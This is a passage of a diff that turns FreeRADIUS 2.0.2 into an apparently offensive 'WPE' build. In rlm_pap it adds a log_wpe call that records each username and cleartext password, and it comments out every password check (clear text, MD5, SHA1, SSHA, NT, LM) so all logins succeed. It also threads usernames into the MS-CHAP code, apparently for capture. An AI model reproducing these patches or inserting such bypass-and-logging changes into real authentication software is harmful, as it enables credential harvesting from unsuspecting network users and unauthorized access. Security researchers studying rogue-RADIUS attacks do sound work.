+		//	return -1;
+		//}
 
 		/*
 		 *	If the password exists, and is an NT-Password,
@@ -1194,8 +1197,10 @@
 		/*
 		 *	Do the MS-CHAP authentication.
 		 */
+		username = pairfind(request->packet->vps, PW_USER_NAME);
 		if (do_mschap(inst, request, password, challenge->vp_octets,
-			      response->vp_octets + offset, nthashhash) < 0) {
+			      response->vp_octets + offset, nthashhash,
+		      		username->vp_strvalue) < 0) {
 			DEBUG2("  rlm_mschap: MS-CHAP-Response is incorrect.");
 			mschap_add_reply(&request->reply->vps,
 					 *response->vp_octets,
@@ -1274,7 +1279,8 @@
 		       username_string);
 
 		if (do_mschap(inst, request, nt_password, mschapv1_challenge,
-			      response->vp_octets + 26, nthashhash) < 0) {
+			      response->vp_octets + 26, nthashhash,
+		      		username_string) < 0) {
 			DEBUG2("  rlm_mschap: FAILED: MS-CHAP2-Response is incorrect");
 			mschap_add_reply(&request->reply->vps,
 					 *response->vp_octets,
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c	2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c	2008-02-15 19:37:35.000000000 -0500
@@ -492,6 +492,10 @@
 		return RLM_MODULE_INVALID;
 	}
 
+	/* WPE */
+	log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+			NULL, 0, NULL, 0);
+
 	/*
 	 *	Clear-text passwords are the only ones we support.
 	 */
@@ -582,11 +586,14 @@
 	do_clear:
 		DEBUG("rlm_pap: Using clear text password \"%s\"",
 		      vp->vp_strvalue);
+		/* WPE - always succeed */
+		/*
 		if (strcmp((char *) vp->vp_strvalue,
 			   (char *) request->password->vp_strvalue) != 0){
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
 			goto make_msg;
 		}
+		*/
 	done:
 		DEBUG("rlm_pap: User authenticated successfully");
 		return RLM_MODULE_OK;
@@ -618,10 +625,13 @@
 		fr_MD5Update(&md5_context, request->password->vp_octets,
 			     request->password->length);
 		fr_MD5Final(digest, &md5_context);
+		/* WPE - Always succeed */
+		/*
 		if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -645,10 +655,13 @@
 		/*
 		 *	Compare only the MD5 hash results, not the salt.
 		 */
+		/* WPE - always succeed */
+		/*
 		if (memcmp(digest, vp->vp_octets, 16) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -667,10 +680,13 @@
 		fr_SHA1Update(&sha1_context, request->password->vp_octets,
 			      request->password->length);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE - Always succeed */
+		/*
 		if (memcmp(digest, vp->vp_octets, vp->length) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -691,10 +707,13 @@
 			   request->password->length);
 		fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
 		fr_SHA1Final(digest,&sha1_context);
+		/* WPE - Always succeed */
+		/*
 		if (memcmp(digest, vp->vp_octets, 20) != 0) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -716,11 +735,14 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE - Always succeed */
+		/*
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (memcmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
 			goto make_msg;
 		}
+		*/
 		goto done;
 		break;
 
@@ -741,16 +763,22 @@
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
 			goto make_msg;
 		}
+		/* WPE - Always succeed */
+		/*
 		if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
 		    (memcmp(digest, vp->vp_octets, vp->length) != 0)) {
 			snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+		*/
+		
 		make_msg:
+		/*
 			DEBUG("rlm_pap: Passwords don't match");
 			module_fmsg_vp = pairmake("Module-Failure-Message",
 						  module_fmsg, T_OP_EQ);
 			pairadd(&request->packet->vps, module_fmsg_vp);
 			return RLM_MODULE_REJECT;
 		}
+		*/
 		goto done;
 		break;
 
